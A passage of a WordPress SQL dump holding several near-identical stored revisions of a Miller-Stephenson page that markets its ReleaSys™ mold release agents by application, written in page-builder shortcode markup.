link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n<p><a name="polyurethane"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver a superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high-performance chemistry adheres tenaciously to mold surfaces such as aluminum, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n<p><a name="rubber"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n<p><a name="injection"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n<p><a name="fiber"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:26:40', '2017-06-08 18:26:40', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4530, 2, '2017-06-08 18:27:50', '2017-06-08 18:27:50', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER" link="#rubber"]\r\n\r\n[button text="INJECTION PLASTICS" link="#injection"]\r\n\r\n[button text="FIBERGLASS" link="#fiber"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE" link="#concrete"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n<p><a name="polyurethane"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver a superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high-performance chemistry adheres tenaciously to mold surfaces such as aluminum, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n<p><a name="rubber"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n<p><a name="injection"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n<p><a name="fiber"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="concrete"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:27:50', '2017-06-08 18:27:50', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4531, 2, '2017-06-08 18:28:53', '2017-06-08 18:28:53', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER" link="#rubber"]\r\n\r\n[button text="INJECTION PLASTICS" link="#injection"]\r\n\r\n[button text="FIBERGLASS" link="#fiber"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE" link="#concrete"]\r\n\r\n[button text="CUSTOM FORMULATIONS" link="#custom"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n<p><a name="polyurethane"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver a superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high-performance chemistry adheres tenaciously to mold surfaces such as aluminum, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n<p><a name="rubber"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n<p><a name="injection"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n<p><a name="fiber"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="concrete"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n<p><a name="custom"></a></p>\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable of developing a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:28:53', '2017-06-08 18:28:53', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4532, 2, '2017-06-08 18:29:19', '2017-06-08 18:29:19', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER" link="#rubber"]\r\n\r\n[button text="INJECTION PLASTICS" link="#injection"]\r\n\r\n[button text="FIBERGLASS" link="#fiber"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE" link="#concrete"]\r\n\r\n[button text="CUSTOM FORMULATIONS" link="#custom"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n<p><a name="polyurethane"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver a superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high-performance chemistry adheres tenaciously to mold surfaces such as aluminum, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" 